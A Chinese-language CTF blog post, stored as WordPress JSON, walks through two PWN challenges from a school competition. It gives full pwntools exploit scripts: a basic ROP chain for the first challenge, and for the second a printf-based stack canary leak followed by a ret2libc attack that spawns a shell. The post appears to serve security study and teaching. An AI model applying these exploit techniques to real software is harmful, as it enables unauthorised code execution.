{"id":448,"date":"2024-12-13T20:49:12","date_gmt":"2024-12-13T12:49:12","guid":{"rendered":"http:\/\/8.141.27.105\/?p=448"},"modified":"2025-01-24T22:47:42","modified_gmt":"2025-01-24T14:47:42","slug":"%e6%9f%90%e6%a0%a1%e7%bd%91%e5%ae%89%e5%ae%9e%e8%b7%b5%e4%b8%89%e6%af%94%e8%b5%9bpwn","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/13\/%e6%9f%90%e6%a0%a1%e7%bd%91%e5%ae%89%e5%ae%9e%e8%b7%b5%e4%b8%89%e6%af%94%e8%b5%9bpwn\/","title":{"rendered":"\u67d0\u6821\u7f51\u5b89\u5b9e\u8df5(\u4e09)\u6bd4\u8d5b|PWN"},"content":{"rendered":"\n<p>&nbsp;PWN\u4e00\u5171\u6709\u4e24\u9053\u9898<\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/13\/%e6%9f%90%e6%a0%a1%e7%bd%91%e5%ae%89%e5%ae%9e%e8%b7%b5%e4%b8%89%e6%af%94%e8%b5%9bpwn\/#1\" title=\"1\">1<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/13\/%e6%9f%90%e6%a0%a1%e7%bd%91%e5%ae%89%e5%ae%9e%e8%b7%b5%e4%b8%89%e6%af%94%e8%b5%9bpwn\/#2\" title=\"2\">2<\/a><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"1\"><\/span>1<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u5e38\u89c4\u7684ROP<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import*\nfrom LibcSearcher import*\ncontext(arch=\"amd64\", os=\"linux\", log_level=\"debug\").\n\n#p=remote(\"172.17.0.15\",14565)\np = process(\"\/home\/monke\/vmcoursectfmatch\/9\/pwn.bin\")\nelf=ELF(\"\/home\/monke\/vmcoursectfmatch\/9\/pwn.bin\")\n\npop_rdi = 0x401c73\nret=0x40101a\nbinsh = 0x4023ff\nsystem=elf.sym&#91;\"system\"]\n\npayload = cyclic(64+8)+p64(pop_rdi)+p64(binsh)+p64(0x401b21)\n\np.sendlineafter('wish: ',payload)\n\n\np.interactive()\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"2\"><\/span>2<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u672c\u9898\u4e0a\u4e86canary\u4fdd\u62a4\uff0c \u5148\u6cc4\u9732canary\u7136\u540e\u6253ret2libc<\/p>\n\n\n\n<p>\u6cc4\u9732canary\u539f\u7406:<\/p>\n\n\n\n<p id=\"u1f9c18db\">\u5229\u7528printf\u4e0d\u9047\u5230\\x00\u4e0d\u7ec8\u6b62\u7684\u7279\u70b9\uff0c\u5982\u679c\u628acanary\u7684\u6700\u4f4e\u5b57\u8282\\x00\u8986\u76d6\u4e86\uff0c\u5c31\u80fd\u5728\u6253\u5370\u65f6\u5019\u987a\u5e26\u628a\u5b83\u6253\u5370\u51fa\u6765\uff0c\u7136\u540e\u51cf\u53bb\u7528\u6765\u8986\u76d6\\x00\u7684\u90a3\u4e00\u5b57\u8282\u7684\u503c\uff0c\u5c31\u80fd\u5f97\u5230canary\u539f\u503c\u3002\u5728\u5c0f\u7aef\u5b58\u50a8\u4e2d\uff0c\\x00\u8fd9\u4e00\u5b57\u8282\u662f\u4e0es\u76f8\u90bb\u7684\u3002<\/p>\n\n\n\n<p id=\"uab59f878\">\u6240\u4ee5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload1=b'a'*72\np.sendlineafter('name?',payload1)\n<\/code><\/pre>\n\n\n\n<p id=\"uf6fea9c5\">sendline\u4f1a\u81ea\u52a8\u52a0\u4e0a\u56de\u8f66\uff0c\u4e5f\u5c31\u662f\u56de\u8f66\u4f1a\u8986\u76d6\u6389\\x00\uff0c\u800c\u56de\u8f66\\n\u7684\u503c\u662f0xa\uff0c\u6240\u4ee5\u62ff\u5230canary\u540e\u8981\u51cf\u53bb0xa\u624d\u662f\u6b63\u786e\u7684\u503c\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>p.recvuntil(b'a'*72)\ncanary=u64(p.recv(8))-0xa<\/code><\/pre>\n\n\n\n<p id=\"u2e54e7d8\">\u8fd9\u6837\u5c31\u62ff\u5230\u4e86canary\uff0c\u63a5\u4e0b\u6765\u5c31\u662f\u5e38\u89c4ret2libc\u4e86<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import*\nfrom LibcSearcher import*\ncontext(arch=\"amd64\", os=\"linux\", log_level=\"info\")\n \n#p=remote(\"172.17.0.15\",14565)\np = process(\"\/home\/monke\/vmcoursectfmatch\/10\/pwn.bin\")\nelf=ELF(\"\/home\/monke\/vmcoursectfmatch\/10\/pwn.bin\")\n \npop_rdi = 0x401343\nret=0x40101a\nbinsh=0x404058\nsystem=0x4010b0\n#gdb.attach(p)\n#\u5229\u7528printf\u6ca1\u8bfb\u5230\\0\u4e0d\u622a\u65ad\u7684\u7279\u70b9\uff0c\u6cc4\u9732canary\n \npayload1=b'a'*72\np.sendlineafter('name?',payload1)\np.recvuntil(b'a'*72)\ncanary=u64(p.recv(8))-0xa\nprint(hex(canary))\n \n#leak\npayload = cyclic(72)+p64(canary)+p64(0)+p64(pop_rdi)+p64(elf.got&#91;\"puts\"])+p64(elf.plt&#91;\"puts\"])+p64(elf.sym&#91;\"main\"])\np.sendlineafter('stack!',payload)\nputs = u64(p.recvuntil('\\x7f')&#91;-6:].ljust(8,b'\\x00'))\nprint(hex(puts))\nlibc=LibcSearcher(\"puts\",puts)\nlibcbase=puts-libc.dump('puts')\nsystem=libcbase+libc.dump('system')\nbinsh=libcbase+libc.dump('str_bin_sh')\nprint(hex(system))\nprint(hex(binsh))\n \n#attack\npayload=cyclic(72)+p64(canary)+p64(0)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)\np.sendlineafter('name?',b'1')\np.sendlineafter('stack!',payload)\n#gdb.attach(p)\np.interactive()\n<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>\u7136\u540e\u6328\u4e2a\u8bd5libc\u7248\u672c\uff0c\u6211\u8bd5\u52302\u51fa\u4e86shell\u3002<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;PWN\u4e00\u5171\u6709\u4e24\u9053\u9898 1 \u5e38\u89c4\u7684ROP 2 \u672c\u9898\u4e0a\u4e86canary\u4fdd\u62a4\uff0c \u5148\u6cc4\u9732canary\u7136\u540e\u6253re [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21,1],"tags":[14,8],"class_list":["post-448","post","type-post","status-publish","format-standard","hentry","category-21","category-game","tag-pwn","tag-8"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/448","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=448"}],"version-history":[{"count":6,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/448\/revisions"}],"predecessor-version":[{"id":844,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/448\/revisions\/844"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=448"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=448"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=448"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}